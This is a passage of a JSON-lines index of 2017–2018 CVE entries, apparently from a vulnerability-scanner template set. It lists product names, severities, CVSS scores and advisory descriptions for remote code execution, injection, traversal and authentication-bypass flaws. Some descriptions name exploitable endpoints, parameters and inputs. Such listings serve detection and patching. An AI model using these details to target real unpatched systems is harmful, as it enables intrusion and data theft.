is vulnerable to a weak encryption flaw resulting in remote code execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2017/CVE-2017-1000486.yaml"} +{"ID":"CVE-2017-10075","Info":{"Name":"Oracle Content Server - Cross-Site Scripting","Severity":"high","Description":"Oracle Content Server version 11.1.1.9.0, 12.2.1.1.0 and 12.2.1.2.0 are susceptible to cross-site scripting. The vulnerability can be used to include HTML or JavaScript code in the affected web page. The code is executed in the browser of users if they visit the manipulated site.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"cves/2017/CVE-2017-10075.yaml"} +{"ID":"CVE-2017-10271","Info":{"Name":"Oracle WebLogic Server - Remote Command Execution","Severity":"high","Description":"The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Security) is susceptible to remote command execution. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. This easily exploitable vulnerability allows unauthenticated attackers with network access via T3 to compromise Oracle WebLogic Server.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2017/CVE-2017-10271.yaml"} +{"ID":"CVE-2017-10974","Info":{"Name":"Yaws 1.91 - Local File Inclusion","Severity":"high","Description":"Yaws 1.91 allows unauthenticated local file inclusion via /%5C../ submitted to port 8080.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2017/CVE-2017-10974.yaml"} +{"ID":"CVE-2017-11444","Info":{"Name":"Subrion CMS \u003c4.1.5.10 - SQL Injection","Severity":"critical","Description":"Subrion CMS before 4.1.5.10 has a SQL injection vulnerability in /front/search.php via the $_GET array.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2017/CVE-2017-11444.yaml"} +{"ID":"CVE-2017-11512","Info":{"Name":"ManageEngine ServiceDesk 9.3.9328 - Arbitrary File Retrieval","Severity":"high","Description":"ManageEngine ServiceDesk 9.3.9328 is vulnerable to an arbitrary file retrieval due to improper restrictions of the pathname used in the name parameter for the download-snapshot path. An unauthenticated remote attacker can use this vulnerability to download arbitrary files.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2017/CVE-2017-11512.yaml"} +{"ID":"CVE-2017-11586","Info":{"Name":"FineCMS \u003c5.0.9 - Open Redirect","Severity":"medium","Description":"FineCMS 5.0.9 contains an open redirect vulnerability via the url parameter in a sync action. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2017/CVE-2017-11586.yaml"} +{"ID":"CVE-2017-11610","Info":{"Name":"XML-RPC Server - Remote Code Execution","Severity":"high","Description":"The XML-RPC server in supervisor before 3.0.1, 3.1.x before 3.1.4, 3.2.x before 3.2.4, and 3.3.x before 3.3.3 allows remote authenticated users to execute arbitrary commands via a crafted XML-RPC request, related to nested supervisor namespace lookups.","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2017/CVE-2017-11610.yaml"} +{"ID":"CVE-2017-11629","Info":{"Name":"FineCMS \u003c=5.0.10 - Cross-Site Scripting","Severity":"medium","Description":"FineCMS through 5.0.10 contains a cross-site scripting vulnerability in controllers/api.php via the function parameter in a c=api\u0026m=data2 request.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2017/CVE-2017-11629.yaml"} +{"ID":"CVE-2017-12138","Info":{"Name":"XOOPS Core 2.5.8 - Open Redirect","Severity":"medium","Description":"XOOPS Core 2.5.8 contains an open redirect vulnerability in /modules/profile/index.php due to the URL filter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2017/CVE-2017-12138.yaml"} +{"ID":"CVE-2017-12149","Info":{"Name":"Jboss Application Server - Remote Code Execution","Severity":"critical","Description":"Jboss Application Server as shipped with Red Hat Enterprise Application Platform 5.2 is susceptible to a remote code execution vulnerability because the doFilter method in the ReadOnlyAccessFilter of the HTTP Invoker does not restrict classes for which it performs deserialization, thus allowing an attacker to execute arbitrary code via crafted serialized data.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2017/CVE-2017-12149.yaml"} +{"ID":"CVE-2017-12542","Info":{"Name":"HPE Integrated Lights-out 4 (ILO4) \u003c2.53 - Authentication Bypass","Severity":"critical","Description":"HPE Integrated Lights-out 4 (iLO 4) prior to 2.53 was found to contain an authentication bypass and code execution vulnerability.","Classification":{"CVSSScore":"10"}},"file_path":"cves/2017/CVE-2017-12542.yaml"} +{"ID":"CVE-2017-12544","Info":{"Name":"HPE System Management - Cross-Site Scripting","Severity":"medium","Description":"HPE System Management contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.","Classification":{"CVSSScore":"5.4"}},"file_path":"cves/2017/CVE-2017-12544.yaml"} +{"ID":"CVE-2017-12583","Info":{"Name":"DokuWiki - Cross-Site Scripting","Severity":"medium","Description":"DokuWiki through 2017-02-19b contains a cross-site scripting vulnerability in the DATE_AT parameter to doku.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2017/CVE-2017-12583.yaml"} +{"ID":"CVE-2017-12611","Info":{"Name":"Apache Struts2 S2-053 - Remote Code Execution","Severity":"critical","Description":"Apache Struts 2.0.0 through 2.3.33 and 2.5 through 2.5.10.1 uses an unintentional expression in a Freemarker tag instead of string literals, which makes it susceptible to remote code execution attacks.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2017/CVE-2017-12611.yaml"} +{"ID":"CVE-2017-12615","Info":{"Name":"Apache Tomcat Servers - Remote Code Execution","Severity":"high","Description":"Apache Tomcat servers 7.0.{0 to 79} are susceptible to remote code execution. By design, you are not allowed to upload JSP files via the PUT method. This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server. However, due to the insufficient checks, an attacker could gain remote code execution on Apache Tomcat servers that have enabled PUT method by using a specially crafted HTTP request.\n","Classification":{"CVSSScore":"8.1"}},"file_path":"cves/2017/CVE-2017-12615.yaml"} +{"ID":"CVE-2017-12629","Info":{"Name":"Apache Solr \u003c= 7.1 - XML Entity Injection","Severity":"critical","Description":"Apache Solr with Apache Lucene before 7.1 is susceptible to remote code execution by exploiting XXE in conjunction with use of a Config API add-listener command to reach the RunExecutableListener class. Elasticsearch, although it uses Lucene, is NOT vulnerable to this. Note that the XML external entity expansion vulnerability occurs in the XML Query Parser which is available, by default, for any query request with parameters deftype=xmlparser and can be exploited to upload malicious data to the /upload request handler or as Blind XXE using ftp wrapper in order to read arbitrary local files from the Solr server. Note also that the second vulnerability relates to remote code execution using the RunExecutableListener available on all affected versions of Solr.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2017/CVE-2017-12629.yaml"} +{"ID":"CVE-2017-12635","Info":{"Name":"Apache CouchDB 1.7.0 / 2.x \u003c 2.1.1 - Remote Privilege Escalation","Severity":"critical","Description":"Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keysfor 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behavior that if two 'roles' keys are available in the JSON, the second one will be used for authorizing the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2017/CVE-2017-12635.yaml"} +{"ID":"CVE-2017-12637","Info":{"Name":"SAP NetWeaver Application Server Java 7.5 - Local File Inclusion","Severity":"high","Description":"SAP NetWeaver Application Server Java 7.5 is susceptible to local file inclusion in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS. This can allow remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2017/CVE-2017-12637.yaml"} +{"ID":"CVE-2017-12794","Info":{"Name":"Django Debug Page - Cross-Site Scripting","Severity":"medium","Description":"Django 1.10.x before 1.10.8 and 1.11.x before 1.11.5 has HTML autoescaping disabled in a portion of the template for the technical 500 debug page. Given the right circumstances, this allows a cross-site scripting attack. This vulnerability shouldn't affect most production sites since run with \"DEBUG = True\" is not on by default (which is what makes the page visible).\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2017/CVE-2017-12794.yaml"} +{"ID":"CVE-2017-14135","Info":{"Name":"OpenDreambox 2.0.0 - Remote Code Execution","Severity":"critical","Description":"OpenDreambox 2.0.0 is susceptible to remote code execution via the webadmin plugin. Remote attackers can execute arbitrary OS commands via shell metacharacters in the command parameter to the /script URI in enigma2-plugins/blob/master/webadmin/src/WebChilds/Script.py.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2017/CVE-2017-14135.yaml"} +{"ID":"CVE-2017-14186","Info":{"Name":"FortiGate SSL VPN Web Portal - Cross Site Scripting","Severity":"medium","Description":"Failure to sanitize the login redir parameter in the SSL-VPN web portal may allow an attacker to perform a Cross-site Scripting (XSS) or an URL Redirection attack.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"cves/2017/CVE-2017-14186.yaml"} +{"ID":"CVE-2017-14535","Info":{"Name":"Trixbox - 2.8.0.4 OS Command Injection","Severity":"high","Description":"Trixbox 2.8.0.4 is vulnerable to OS command injection via shell metacharacters in the lang parameter to /maint/modules/home/index.php.","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2017/CVE-2017-14535.yaml"} +{"ID":"CVE-2017-14537","Info":{"Name":"Trixbox 2.8.0 - Path Traversal","Severity":"medium","Description":"Trixbox 2.8.0.4 is susceptible to path traversal via the xajaxargs array parameter to /maint/index.php?packages or the lang parameter to /maint/modules/home/index.php.","Classification":{"CVSSScore":"6.5"}},"file_path":"cves/2017/CVE-2017-14537.yaml"} +{"ID":"CVE-2017-14651","Info":{"Name":"WSO2 Data Analytics Server 3.1.0 - Cross-Site Scripting","Severity":"medium","Description":"WSO2 Data Analytics Server 3.1.0 is susceptible to cross-site scripting in carbon/resources/add_collection_ajaxprocessor.jsp via the collectionName or parentPath parameter.","Classification":{"CVSSScore":"4.8"}},"file_path":"cves/2017/CVE-2017-14651.yaml"} +{"ID":"CVE-2017-14849","Info":{"Name":"Node.js \u003c8.6.0 - Directory Traversal","Severity":"high","Description":"Node.js before 8.6.0 allows remote attackers to access unintended files because a change to \"..\" handling is incompatible with the pathname validation used by unspecified community modules.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2017/CVE-2017-14849.yaml"} +{"ID":"CVE-2017-15287","Info":{"Name":"Dreambox WebControl 2.0.0 - Cross-Site Scripting","Severity":"medium","Description":"Dream Multimedia Dreambox devices via their WebControl component are vulnerable to reflected cross-site scripting, as demonstrated by the \"Name des Bouquets\" field, or the file parameter to the /file URI.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2017/CVE-2017-15287.yaml"} +{"ID":"CVE-2017-15363","Info":{"Name":"Luracast Restler 3.0.1 via TYPO3 Restler 1.7.1 - Local File Inclusion","Severity":"high","Description":"Luracast Restler 3.0.1 via TYPO3 Restler 1.7.1 is susceptible to local file inclusion in public/examples/resources/getsource.php. This could allow remote attackers to read arbitrary files via the file parameter.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2017/CVE-2017-15363.yaml"} +{"ID":"CVE-2017-15647","Info":{"Name":"FiberHome Routers - Local File Inclusion","Severity":"high","Description":"FiberHome routers are susceptible to local file inclusion in /cgi-bin/webproc via the getpage parameter in conjunction with a crafted var:page value.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2017/CVE-2017-15647.yaml"} +{"ID":"CVE-2017-15715","Info":{"Name":"Apache httpd \u003c=2.4.29 - Arbitrary File Upload","Severity":"high","Description":"Apache httpd 2.4.0 to 2.4.29 is susceptible to arbitrary file upload vulnerabilities via the expression specified in \u003cFilesMatch\u003e, which could match '$' to a newline character in a malicious filename rather than matching only the end of the filename. This could be exploited in environments where uploads of some files are externally blocked, but only by matching the trailing portion of the filename.","Classification":{"CVSSScore":"8.1"}},"file_path":"cves/2017/CVE-2017-15715.yaml"} +{"ID":"CVE-2017-15944","Info":{"Name":"Palo Alto Network PAN-OS - Remote Code Execution","Severity":"critical","Description":"Palo Alto Network PAN-OS and Panorama before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2017/CVE-2017-15944.yaml"} +{"ID":"CVE-2017-16806","Info":{"Name":"Ulterius Server \u003c 1.9.5.0 - Directory Traversal","Severity":"high","Description":"Ulterius Server before 1.9.5.0 allows HTTP server directory traversal via the process function in RemoteTaskServer/WebServer/HttpServer.cs.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2017/CVE-2017-16806.yaml"} +{"ID":"CVE-2017-16877","Info":{"Name":"Nextjs \u003c2.4.1 - Local File Inclusion","Severity":"high","Description":"ZEIT Next.js before 2.4.1 is susceptible to local file inclusion via the /_next and /static request namespace, allowing attackers to obtain sensitive information.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2017/CVE-2017-16877.yaml"} +{"ID":"CVE-2017-17043","Info":{"Name":"WordPress Emag Marketplace Connector 1.0 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Emag Marketplace Connector plugin 1.0 contains a reflected cross-site scripting vulnerability because the parameter \"post\" to /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php is not filtered correctly.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2017/CVE-2017-17043.yaml"} +{"ID":"CVE-2017-17059","Info":{"Name":"WordPress amtyThumb Posts 8.1.3 - Cross-Site Scripting","Severity":"medium","Description":"WordPress amty-thumb-recent-post plugin 8.1.3 contains a cross-site scripting vulnerability via the query string to amtyThumbPostsAdminPg.php.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2017/CVE-2017-17059.yaml"} +{"ID":"CVE-2017-17451","Info":{"Name":"WordPress Mailster \u003c=1.5.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Mailster 1.5.4 and before contains a cross-site scripting vulnerability in the unsubscribe handler via the mes parameter to view/subscription/unsubscribe2.php.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2017/CVE-2017-17451.yaml"} +{"ID":"CVE-2017-17562","Info":{"Name":"Embedthis GoAhead \u003c3.6.5 - Remote Code Execution","Severity":"high","Description":"description: Embedthis GoAhead before 3.6.5 allows remote code execution if CGI is enabled and a CGI program is dynamically linked.\n","Classification":{"CVSSScore":"8.1"}},"file_path":"cves/2017/CVE-2017-17562.yaml"} +{"ID":"CVE-2017-17736","Info":{"Name":"Kentico - Installer Privilege Escalation","Severity":"critical","Description":"Kentico 9.0 before 9.0.51 and 10.0 before 10.0.48 are susceptible to a privilege escalation attack. An attacker can obtain Global Administrator access by visiting CMSInstall/install.aspx and then navigating to the CMS Administration Dashboard.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2017/CVE-2017-17736.yaml"} +{"ID":"CVE-2017-18024","Info":{"Name":"AvantFAX 3.3.3 - Cross-Site Scripting","Severity":"medium","Description":"AvantFAX 3.3.3 contains a cross-site scripting vulnerability via an arbitrary parameter name submitted to the default URL, as demonstrated by a parameter whose name contains a SCRIPT element and whose value is 1.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2017/CVE-2017-18024.yaml"} +{"ID":"CVE-2017-18536","Info":{"Name":"WordPress Stop User Enumeration \u003c=1.3.7 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Stop User Enumeration 1.3.7 and earlier are vulnerable to unauthenticated reflected cross-site scripting.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2017/CVE-2017-18536.yaml"} +{"ID":"CVE-2017-18598","Info":{"Name":"WordPress Qards - Cross-Site Scripting","Severity":"medium","Description":"WordPress Qards through 2017-10-11 contains a cross-site scripting vulnerability via a remote document specified in the URL parameter to html2canvasproxy.php.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2017/CVE-2017-18598.yaml"} +{"ID":"CVE-2017-18638","Info":{"Name":"Graphite \u003c=1.1.5 - Server-Side Request Forgery","Severity":"high","Description":"Graphite's send_email in graphite-web/webapp/graphite/composer/views.py in versions up to 1.1.5 is vulnerable to server-side request forgery (SSR)F. The vulnerable SSRF endpoint can be used by an attacker to have the Graphite web server request any resource. The response to this SSRF request is encoded into an image file and then sent to an email address that can be supplied by the attacker. Thus, an attacker can exfiltrate any information.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2017/CVE-2017-18638.yaml"} +{"ID":"CVE-2017-3506","Info":{"Name":"Oracle Fusion Middleware Weblogic Server - Remote OS Command Execution","Severity":"high","Description":"The Oracle WebLogic Server component of Oracle Fusion Middleware (Web Services) versions 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2 is susceptible to a difficult to exploit vulnerability that could allow unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server.","Classification":{"CVSSScore":"7.4"}},"file_path":"cves/2017/CVE-2017-3506.yaml"} +{"ID":"CVE-2017-3528","Info":{"Name":"Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect","Severity":"medium","Description":"The Oracle Applications Framework component of Oracle E-Business Suite (subcomponent: Popup windows (lists of values, datepicker, etc.)) is impacted by open redirect issues in versions 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6. These easily exploitable vulnerabilities allow unauthenticated attackers with network access via HTTP to compromise Oracle Applications Framework. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Applications Framework, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Applications Framework accessible data.","Classification":{"CVSSScore":"5.4"}},"file_path":"cves/2017/CVE-2017-3528.yaml"} +{"ID":"CVE-2017-3881","Info":{"Name":"Cisco IOS 12.2(55)SE11 - Remote Code Execution","Severity":"critical","Description":"A vulnerability in the Cisco Cluster Management Protocol (CMP) processing code in Cisco IOS and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an affected device or remotely execute code with elevated privileges. The Cluster Management Protocol utilizes Telnet internally as a signaling and command protocol between cluster members. The vulnerability is due to the combination of two factors: (1) the failure to restrict the use of CMP-specific Telnet options only to internal, local communications between cluster members and instead accept and process such options over any Telnet connection to an affected device; and (2) the incorrect processing of malformed CMP-specific Telnet options. An attacker could exploit this vulnerability by sending malformed CMP-specific Telnet options while establishing a Telnet session with an affected Cisco device configured to accept Telnet connections. An exploit could allow an attacker to execute arbitrary code and obtain full control of the device or cause a reload of the affected device. This affects Catalyst switches, Embedded Service 2020 switches, Enhanced Layer 2 EtherSwitch Service Module, Enhanced Layer 2/3 EtherSwitch Service Module, Gigabit Ethernet Switch Module (CGESM) for HP, IE Industrial Ethernet switches, ME 4924-10GE switch, RF Gateway 10, and SM-X Layer 2/3 EtherSwitch Service Module. Cisco Bug IDs: CSCvd48893.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2017/CVE-2017-3881.yaml"} +{"ID":"CVE-2017-4011","Info":{"Name":"McAfee Network Data Loss Prevention 9.3.x - Cross-Site Scripting","Severity":"medium","Description":"McAfee Network Data Loss Prevention User-Agent 9.3.x contains a cross-site scripting vulnerability which allows remote attackers to get session/cookie information via modification of the HTTP request.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2017/CVE-2017-4011.yaml"} +{"ID":"CVE-2017-5487","Info":{"Name":"WordPress Core \u003c 4.7.1 - Username Enumeration","Severity":"medium","Description":"WordPress Core \u003c 4.7.1 is susceptible to user enumeration because it does not properly restrict listings of post authors via wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request.","Classification":{"CVSSScore":"5.3"}},"file_path":"cves/2017/CVE-2017-5487.yaml"} +{"ID":"CVE-2017-5521","Info":{"Name":"NETGEAR Routers - Authentication Bypass","Severity":"high","Description":"NETGEAR R8500, R8300, R7000, R6400, R7300, R7100LG, R6300v2, WNDR3400v3, WNR3500Lv2, R6250, R6700, R6900, and R8000 devices are susceptible to authentication bypass via simple crafted requests to the web management server.\n","Classification":{"CVSSScore":"8.1"}},"file_path":"cves/2017/CVE-2017-5521.yaml"} +{"ID":"CVE-2017-5631","Info":{"Name":"KMCIS CaseAware - Cross-Site Scripting","Severity":"medium","Description":"KMCIS CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2017/CVE-2017-5631.yaml"} +{"ID":"CVE-2017-5638","Info":{"Name":"Apache Struts 2 - Remote Command Execution","Severity":"critical","Description":"Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 is vulnerable to remote command injection attacks through incorrectly parsing an attacker's invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.","Classification":{"CVSSScore":"10"}},"file_path":"cves/2017/CVE-2017-5638.yaml"} +{"ID":"CVE-2017-5689","Info":{"Name":"Intel Active Management Technology - Authentication Bypass","Severity":"critical","Description":"An unprivileged network attacker could gain system privileges to provisioned Intel manageability SKUs: Intel Active Management Technology (AMT) and Intel Standard Manageability (ISM). An unprivileged local attacker could provision manageability features gaining unprivileged network or local system privileges on Intel manageability SKUs: Intel Active Management Technology (AMT), Intel Standard Manageability (ISM), and Intel Small Business Technology (SBT).\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2017/CVE-2017-5689.yaml"} +{"ID":"CVE-2017-5982","Info":{"Name":"Kodi 17.1 - Local File Inclusion","Severity":"high","Description":"Kodi 17.1 is vulnerable to local file inclusion vulnerabilities because of insufficient validation of user input.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2017/CVE-2017-5982.yaml"} +{"ID":"CVE-2017-6090","Info":{"Name":"PhpColl 2.5.1 Arbitrary File Upload","Severity":"high","Description":"PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in logos_clients/ via clients/editclient.php.","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2017/CVE-2017-6090.yaml"} +{"ID":"CVE-2017-7269","Info":{"Name":"Windows Server 2003 \u0026 IIS 6.0 - Remote Code Execution","Severity":"critical","Description":"Internet Information Services (IIS) 6.0 in Microsoft Windows Server 2003 R2 contains a buffer overflow vulnerability in the ScStoragePathFromUrl function in the WebDAV service that could allow remote attackers to execute arbitrary code via a long header beginning with \"If \u003chttp://\" in a PROPFIND request.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2017/CVE-2017-7269.yaml"} +{"ID":"CVE-2017-7391","Info":{"Name":"Magmi 0.7.22 - Cross-Site Scripting","Severity":"medium","Description":"Magmi 0.7.22 contains a cross-site scripting vulnerability due to insufficient filtration of user-supplied data (prefix) passed to the magmi-git-master/magmi/web/ajax_gettime.php URL.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2017/CVE-2017-7391.yaml"} +{"ID":"CVE-2017-7615","Info":{"Name":"MantisBT \u003c=2.30 - Arbitrary Password Reset/Admin Access","Severity":"high","Description":"MantisBT through 2.3.0 allows arbitrary password reset and unauthenticated admin access via an empty confirm_hash value to verify.php.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2017/CVE-2017-7615.yaml"} +{"ID":"CVE-2017-7921","Info":{"Name":"Hikvision - Authentication Bypass","Severity":"critical","Description":"Hikvision DS-2CD2xx2F-I Series V5.2.0 build 140721 to V5.4.0 build 160530, DS-2CD2xx0F-I Series V5.2.0 build 140721 to V5.4.0 Build 160401, DS-2CD2xx2FWD Series V5.3.1 build 150410 to V5.4.4 Build 161125, DS-2CD4x2xFWD Series V5.2.0 build 140721 to V5.4.0 Build 160414, DS-2CD4xx5 Series V5.2.0 build 140721 to V5.4.0 Build 160421, DS-2DFx Series V5.2.0 build 140805 to V5.4.5 Build 160928, and DS-2CD63xx Series V5.0.9 build 140305 to V5.3.5 Build 160106 devices contain an improper authentication issue. The improper authentication vulnerability occurs when an application does not adequately or correctly authenticate users. This may allow a malicious user to escalate his or her privileges on the system and gain access to sensitive information.","Classification":{"CVSSScore":"10"}},"file_path":"cves/2017/CVE-2017-7921.yaml"} +{"ID":"CVE-2017-8917","Info":{"Name":"Joomla! \u003c3.7.1 - SQL Injection","Severity":"critical","Description":"Joomla! before 3.7.1 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2017/CVE-2017-8917.yaml"} +{"ID":"CVE-2017-9140","Info":{"Name":"Reflected XSS - Telerik Reporting Module","Severity":"medium","Description":"Cross-site scripting vulnerability in Telerik.ReportViewer.WebForms.dll in Telerik Reporting for ASP.NET WebForms Report Viewer control before R1 2017 SP2 (11.0.17.406) allows remote attackers to inject arbitrary web script or HTML via the bgColor parameter to Telerik.ReportViewer.axd.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2017/CVE-2017-9140.yaml"} +{"ID":"CVE-2017-9288","Info":{"Name":"WordPress Raygun4WP \u003c=1.8.0 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Raygun4WP 1.8.0 contains a reflected cross-site scripting vulnerability via sendtesterror.php.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2017/CVE-2017-9288.yaml"} +{"ID":"CVE-2017-9506","Info":{"Name":"Atlassian Jira IconURIServlet - Cross-Site Scripting/Server-Side Request Forgery","Severity":"medium","Description":"The Atlassian Jira IconUriServlet of the OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 contains a cross-site scripting vulnerability which allows remote attackers to access the content of internal network resources and/or perform an attack via Server Side Request Forgery.","Classification":{"CVSSScore":"6.1"}},"file_path":"cves/2017/CVE-2017-9506.yaml"} +{"ID":"CVE-2017-9791","Info":{"Name":"Apache Struts2 S2-053 - Remote Code Execution","Severity":"critical","Description":"Apache Struts 2.1.x and 2.3.x with the Struts 1 plugin might allow remote code execution via a malicious field value passed in a raw message to the ActionMessage.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2017/CVE-2017-9791.yaml"} +{"ID":"CVE-2017-9805","Info":{"Name":"Apache Struts2 S2-052 - Remote Code Execution","Severity":"high","Description":"The REST Plugin in Apache Struts 2.1.1 through 2.3.x before 2.3.34 and 2.5.x before 2.5.13 uses an XStreamHandler with an instance of XStream for deserialization without any type of filtering, which can lead to remote code execution when deserializing XML payloads.","Classification":{"CVSSScore":"8.1"}},"file_path":"cves/2017/CVE-2017-9805.yaml"} +{"ID":"CVE-2017-9822","Info":{"Name":"DotNetNuke 5.0.0 - 9.3.0 - Cookie Deserialization Remote Code Execution","Severity":"high","Description":"DotNetNuke (DNN) versions between 5.0.0 - 9.3.0 are affected by a deserialization vulnerability that leads to remote code execution.","Classification":{"CVSSScore":"8.8"}},"file_path":"cves/2017/CVE-2017-9822.yaml"} +{"ID":"CVE-2017-9833","Info":{"Name":"BOA Web Server 0.94.14 - Arbitrary File Access","Severity":"high","Description":"BOA Web Server 0.94.14 is susceptible to arbitrary file access. The server allows the injection of \"../..\" using the FILECAMERA variable sent by GET to read files with root privileges and without using access credentials.","Classification":{"CVSSScore":"7.5"}},"file_path":"cves/2017/CVE-2017-9833.yaml"} +{"ID":"CVE-2017-9841","Info":{"Name":"PHPUnit - Remote Code Execution","Severity":"critical","Description":"PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a \"\u003c?php \" substring via Util/PHP/eval-stdin.php , as demonstrated by an attack on a site with an exposed /vendor folder, i.e., external access to the /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php URI.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2017/CVE-2017-9841.yaml"} +{"ID":"CVE-2018-0127","Info":{"Name":"Cisco RV132W/RV134W Router - Information Disclosure","Severity":"critical","Description":"Cisco RV132W ADSL2+ Wireless-N VPN Routers and Cisco RV134W VDSL2 Wireless-AC VPN Routers could allow an unauthenticated, remote attacker to view configuration parameters for an affected device via the web interface, which could lead to the disclosure of confidential information.","Classification":{"CVSSScore":"9.8"}},"file_path":"cves/2018/CVE-2018-0127.yaml"} +{"ID":"CVE-2018-0296","Info":{"Name":"Cisco ASA - Local File Inclusion","Severity":"high","Description":"Cisco Adaptive Security Appliances (ASA) web interfaces could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition. It is also possible on certain software releases that the ASA will not reload, but an attacker could view sensitive system information without authentication by using directory traversal techniques. The vulnerability is due to lack of proper input validation of the HTTP URL. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. An exploit could allow the attacker to cause a DoS condition or unauthenticated disclosure of information. This vulnerability applies to IPv4 and IPv6 HTTP traffic. This vulnerability affects Cisco ASA Software and Cisco Firepower Threat Defense (FTD) Software that is running on the following Cisco products: 3000 Series Industrial Security Appliance (ISA), ASA 1000V Cloud Firewall, ASA 5500 Series Adaptive Security Appliances, ASA 5500-X Series Next-Generation Firewalls, ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers, Adaptive Security Virtual Appliance (ASAv), Firepower 2100 Series Security Appliance, Firepower 4100 Series Security Appliance, 